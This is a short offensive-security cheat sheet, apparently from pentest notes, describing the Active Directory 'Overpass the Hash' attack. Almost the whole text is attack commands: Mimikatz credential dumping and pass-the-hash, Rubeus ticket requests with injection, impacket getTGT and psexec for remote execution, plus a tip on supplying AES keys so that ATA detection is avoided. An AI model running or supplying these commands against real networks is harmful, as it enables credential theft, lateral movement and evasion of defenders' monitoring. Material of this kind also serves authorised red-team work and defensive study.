Overpass the Hash
Steps
Step 1 - Obtain Hashes of Your Target User
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'Step 2 - Overpassing the Hash
# You may need the AES256 and AES128 keys too if the DC is running ATA, this way detection is avoided
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm> /run:powershell.exe [/aes256:<aes256_hash> /aes128:<aes128_hash>]"'.\Rubeus.exe asktgt /domain:<domain> /user:<user> /rc4:<ntlm> /pttpython getTGT.py <domain>/<user> -hashes :<ntlm>
export KRB5CCNAME=ticket.ccache
python3 psexec.py -k <domain> -no-pass Last updated